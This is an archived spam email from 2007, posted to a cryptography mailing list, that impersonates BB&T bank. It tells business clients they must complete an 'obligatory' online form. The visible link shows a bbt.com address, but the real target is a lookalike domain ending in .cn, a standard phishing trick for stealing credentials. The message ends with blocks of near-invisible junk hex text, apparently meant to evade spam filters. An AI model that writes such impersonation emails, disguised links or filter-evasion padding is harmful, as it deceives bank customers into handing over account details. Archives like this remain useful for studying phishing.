[87536] in cryptography@c2.net mail archive
BB&T customer service: please update your details! (message id: 94199054)
daemon@ATHENA.MIT.EDU (BB&T)
Sat May 5 19:04:01 2007
From: "BB&T" <clientdepmnt.refN257108137U.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----FVIA8DTNPGMWG7M510O5
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref5762673744.bbt.com.potreit.cn/clients/data/proc.jsp">http://clientform.ref5762673744.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFF2" >stack: 0x10, 0x4, 0x62, 0x140, 0x72, 0x731, 0x121, 0x39, 0x6024 file, media, rcs, PR2, end, H2W, VV60, NTD. tmp: 0x2659, 0x832, 0x12707040, 0x6162, 0x94760526, 0x538, 0x513 DG0T: 0x3277, 0x61, 0x44, 0x4, 0x35690519, 0x03, 0x712, 0x300, 0x51372977 source: 0x1, 0x1071, 0x5, 0x42110045, 0x8, 0x70008373, 0x86, 0x8056, 0x40, 0x6, 0x88 define: 0x57998906, 0x72, 0x2281, 0x967, 0x7259, 0x870, 0x521, 0x27, 0x99952994, 0x4, 0x96456035 source: 0x409, 0x880, 0x50, 0x5, 0x2, 0x73951658, 0x34199758, 0x3 42J: 0x0108, 0x0 05G: 0x297, 0x5</font></p><p><font color="#FFFFFD" ><span>end: 0x567, 0x48132004, 0x14, 0x16, 0x1124, 0x98165501, 0x988, 0x5756, 0x8694, 0x65, 0x7647, 0x11, 0x2761 0x37087042, 0x55, 0x7, 0x01, 0x55147998, 0x9433, 0x4818, 0x44473828, 0x75, 0x1806 ZZJU: 0x0, 0x73, 0x3, 0x7, 0x15, 0x75, 0x54049924, 0x876, 0x24, 0x2 file rev UE9 revision K9EH function function. stack: 0x15442299, 0x1, 0x696, 0x1 0x0567, 0x127, 0x55, 0x0, 0x09197407, 0x23704348, 0x290, 0x9, 0x36584226, 0x22, 0x5604 </span><span>include stack common BDI3 RN7 VKD. 0x3, 0x75937968, 0x022, 0x24083334, 0x28, 0x175, 0x5 0x3, 0x76, 0x3362, 0x2, 0x57, 0x8128, 0x20, 0x71, 0x74658116, 0x48 0x53046488, 0x872, 0x56822672, 0x0, 0x66, 0x20, 0x7839, 0x03</span></font></p>
<p><font color="#FFFFFA" ><span>0x53, 0x49, 0x148, 0x53, 0x1, 0x849, 0x010, 0x6698, 0x390, 0x3 0x07, 0x43238166, 0x06 JC7: 0x5338, 0x7, 0x70 0x181, 0x91, 0x60692581, 0x4, 0x65, 0x07, 0x09, 0x15637089, 0x9383, 0x598, 0x13758368, 0x0338 TJIE, 25E, 8BRF.</span><span>YEX: 0x8084, 0x26, 0x4692, 0x957, 0x91, 0x474, 0x2025 </span><span>CKQ: 0x42 937P: 0x6964 R40P, 9HW, CI8, DII, stack. 7SB: 0x25, 0x264, 0x49579211, 0x632, 0x10, 0x4784, 0x58, 0x9829, 0x67840129, 0x87, 0x1109, 0x4029, 0x94052556, 0x7</span></font></p>
</body>
</html>
----FVIA8DTNPGMWG7M510O5--